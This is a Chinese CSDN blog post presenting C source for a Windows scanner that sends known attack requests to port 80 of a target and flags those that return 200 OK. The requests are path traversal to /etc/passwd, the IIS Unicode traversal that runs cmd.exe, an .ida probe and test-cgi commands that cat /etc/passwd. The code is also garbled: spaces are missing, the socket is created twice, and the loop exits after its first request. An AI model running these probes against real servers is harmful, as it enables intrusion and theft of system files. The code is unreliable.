网站80端口特殊文件扫描

最新推荐文章于 2022-05-05 14:27:31 发布
最新推荐文章于 2022-05-05 14:27:31 发布
阅读量3w 收藏
点赞数
分类专栏: 网络安全技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/notbaron/article/details/53193371
版权

网站80端口特殊文件扫描

#include <stdio.h>

#include <string.h>

#include <WinSock2.h>

#pragma comment(lib,"ws2_32.lib")

int main(intargc,char*argv[])

{

    if(argc!=2){

        printf("Useage : scan [IP address]\n");

        return(1);

    }

    structsockaddr_in blah;

    structhostent *he;

    WSADATA wsaData;

    inti;

    WORD wVersionRequested;

    SOCKET sock;

    charbuff[1024];

    char*ex[10];

    ex[1]="GET /../../../../etc/passwd HTTP/1.0\n\n";

    ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\HTTP/1.0\n\n";

    ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0\n\n";

    ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";

    ex[5]="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwdHTTP/1.0\n\n";

    ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";

    char*fmsg="HTTP/1.1 200 OK";

    wVersionRequested= MAKEWORD( 2, 2 );

    if(WSAStartup(wVersionRequested , &wsaData)){

        printf("Winsock Initialization failed.\n");

        exit(1);

    }

 

    if((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){

        printf("Can not create socket.\n");

        exit(1);

    }

    sock =socket(AF_INET,SOCK_STREAM,0);

    blah.sin_family= AF_INET;

    blah.sin_port= htons(80);

    blah.sin_addr.s_addr= inet_addr(argv[1]);

    if((he=gethostbyname(argv[1]))!=NULL){

        memcpy((char*)&blah.sin_addr.s_addr,he->h_addr,he->h_length);

    }

    else{

        if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){

            WSACleanup();

            exit(1);

        }

    }

    for(i=1 ; i<7; i++) {

        if(connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){

            send(sock,ex[i],strlen(ex[i]),0);

            recv(sock,buff,sizeof(buff),0);

            if(strstr(buff,fmsg)!=NULL){

                printf("\nFound :%s\n", ex[i]);

            }

        }

        closesocket(sock);

        WSACleanup();

        return(1);

    }

}

1、连接目标主机SERVER;

2、向目标主机发送GET请求;

3、接收目标返回数据;

4、根据返回数据判断文件是否存在。

badman250
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网站备份文件扫描工具
11-26
1.无限设置多个关键词和长尾词,软件会自动使用搜索智能引擎搜索,获取结果的域名进行网站空间文件扫描。 2.智能引擎搜索支持多种主流搜索引擎,目前支持百度,GOOGLE,有道,搜狗,雅虎,搜搜。 3.可导入自己本地域名文件域名扫描,用以扫描自己采集的域名。 4.查找文件自定义,支持多个查找文件,并支持变量类型。 5.自定多线程高速扫描,普通ADSL开150线程平均每分钟可发送HTTP请求10000次以上。 6.扫描结果自动查询文件类型(Content-Type)文件大小(Content-Length)。 7.结果过滤功能,可过滤大小小于指定字节的文件,可过滤文件类型为未知以及文件大小为未知的结果,最大限度清除垃圾结果(可过滤比如自定义404错误页面 或者防盗链组件生成的页面)。 目前支持23个变量分别为:功能灰常强大,具体请看下放截图. 1.flashfxp.zip 代表扫描域名空间是否有FTP打包备份 = flashfxp.zip 2.flashfxp.rar 代表扫描域名空间是否有FTP打包备份 = flashfxp.rar 3.新建文件夹.rar 代表扫描域名空间是否有新建
扫描网站后台文件
05-23
不用FTP和网站后台用户名密码可以看到网站的后台文件
Nmap 中的各种端口扫描技术
Liu_Bruce的博客
05-02 1万+
Nmap 中的各种端口扫描技术 1. SYN 扫描 SYN扫描是较为流行的一种扫描方式,同时它也是Nmap所采用的默认扫描方式。这种扫描方式速度极快,可以在一秒内扫描上千个端口,并且不容易被网络中的安全设备发现。 你也可以在扫描的时候,输入参数-sS。其实你只要以root或者administrator用户的权限工作,扫描方式都是SYN。Nmap会向目标设备的一个端口发送请求连接的SYN数据包,而且目标设备在接收到这个SYN数据包之后,扫描器在收到SYN+ACK数据包后,不是发送ACK数据包而是发送RST数
测试某端口是否开启
szuhuanggang的博客
07-10 2255
方法1 wget ip:port # 80端口可省略 例子: 方法2 nc [-options] [host/IP] [port] nc 即 netcat 。 netcat 是一个简单的 Unix 工具,它使用 TCP 或 UDP 协议去读写网络连接间的数据。 例子: -z :Zero-I/O mode, report connection status on...
网站备份文件扫描工具2017最新版
09-06
网站备份文件2017最新扫描工具,支持多种备份和线程扫描,是网站开发者、爱好者最好的工具,强烈建议收藏使用。
80端口检测工具.rar
08-18
80端口检测工具可以帮助识别这些状态,例如,如果80端口被其他程序占用,可能导致网站无法访问。 3. **常用端口检测工具**:有很多命令行工具和图形化应用可以进行端口检测,如`nc`(Netcat)、`telnet`、`nmap`等...
6666端口扫描器最新下载
12-18
扫描6666端口是为了目标系统是否在使用这个非标准端口,可能存在特殊用途或者安全隐患。 扫描器的运作原理通常是通过发送SYN或ACK数据包到目标主机的指定端口,然后根据返回的响应来判断端口的状态,如打开...
端口扫描高并发测试程序
09-29
异步模式扫描全网开启了80端口主机。 结果保存在IpMap.txt文件中。 ResetIP.txt文件保存了被GFW拦截或服务器有特殊安全配置的主机 配置为10万并发,实测并发数16378,更多并发需要修改注册表,让操作系统允许创建...
最新很好用的极速端口扫描
06-14
端口扫描是网络管理员和安全专家常用的一种技术,用于目标主机上开放的服务和端口。"最新很好用的极速端口扫描" 提供了一种高效且便捷的工具,能够帮助用户快速识别网络中的可用资源和潜在的安全风险。下面将...
网络端口扫描实验指导讲解.pdf
12-02
本文档提供了网络端口扫描实验的指导讲解,包括实验目的、实验预习提示、网络扫描概述、地址扫描、漏洞扫描、端口扫描等内容。实验目的包括学习端口扫描技术的基本原理、理解端口扫描技术在网络攻防中的应用,并通过...
网站备份文件扫描
12-15
网站备份文件扫描 改成cgi1.lst即可扫描目录
snallygaster:扫描HTTP服务器上的秘密文件的工具
02-28
Snallygaster 查找HTTP服务器上的文件泄漏和其他安全问题。 什么? snallygaster是一种工具,用于查找在Web服务器上可访问的,不应该公开的文件,这些文件可能会带来安全风险。 典型示例包括可公开访问的git存储库,可能包含密码的备份文件数据库转储。 此外,它还包含一些其他安全漏洞的检查。 作为对这些问题的介绍,您可能需要观看此演讲: 请参阅文件以获取所有测试的概述以及有关此问题的更多信息的链接。 安装 snallygaster可: pip3 install snallygaster 这是一个简单的python 3脚本,因此您只需下载文件“ snallygaster”并执行它即可。 依赖项是urllib3,beautifulsoup4和dnspython。 在基于Debian或Ubuntu的发行版中,您可以通过以下方式安装它们: apt install
扫描---实验一:端口扫描(X-scan)
weixin_70557959的博客
05-05 7864
一、实验目的及要求 掌握使用X-scan对目标主机进行综合检测,查看相关漏洞信息。 二、实验原理 计算机通过各个端口与其他设备交换信息,每一个打开的端口都是一个潜在的通信通道,同时也意味着是一个可入侵的通道。对目标计算机进行端口扫描,就能得到许多有用的信息。端口扫描可以通过手工进行扫描,也可以用端口扫描器进行扫描扫描器是一种自动检测远程或本地主机安全性弱点的程序,通过使用扫描器可以不留痕迹的发现远程服务器的各种TCP端口的分配及提供的服务和它们的软件版本,可以直观了解到存在的安全问题。X-sca
【python】批量扫描IP地址80/8080端口
小海的专栏
08-23 5950
主要是在实习当中用到的IP端口扫描的一个操作,python语言,输出到txt文档中,同时显示在dos输出窗口上。 代码: 文件名:port_scan.py #!/usr/bin/env python import socket def check_port(address,port): s=socket.socket() try: s.connect((a
metasploit-端口扫描
weixin_30815469的博客
05-09 265
大体可以分为两种方式: 1.调用nmap进行端口扫描 msfconsole nmap -v -sV www.cstc.org.cn 扫描结果(端口开放情况以及目标服务操作系统相关操作信息) PORT STATE SERVICE VERSION21/tcp open ftp Microsoft ftpd80/tcp open http ...
kali渗透80端口的php,kali linux 网络渗透测试学习笔记(一)Nmap工具进行端口扫描...
weixin_28790465的博客
04-02 4681
一.利用Nmap扫描网站服务器的端口开放情况首先打开我们的kali linux才做系统,再打开其命令行模式,输入:nmap www.csdn.net 如下图所示: 因此,通过这个结果可以表明csdn上的端口开放了80端口以及443端口吗,这两个端口都十分重要,因为80端口适用于给用户呈现出数据,给用户看网站用的,443端口也是一个比较重要的端口。而且此网站并没有其他端口的开放,说明安全性还是很好的...
端口扫描技术
热门推荐
badman250的专栏
11-17 3万+
端口扫描技术 服务器上所开放的端口就是潜在的通信通道,也就是一个入侵通道。对目标计算机进行端口扫描,能得到许多有用的信息,进行端口扫描的方法很多,可以是手工进行扫描、也可以用端口扫描软件进行。扫描器通过选用远程TCP/IP不同的端口的服务,并记录目标给予的回答,通过这种方法可以搜集到很多关于目标主机的各种有用的信息,例如远程系统是否支持匿名登陆、是否存在可写的FTP目录、是否开放TELNET
端口扫描程序的设计49681.pdf
最新发布
07-05
本篇文档主要介绍了端口扫描程序的设计,课程背景为计算机科学与技术学院网络工程系的课程项目。系统设计的目标旨在让学生通过实践掌握漏洞和端口基础知识,了解扫描器的基本工作原理,并设计和实现一个端口扫描程序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值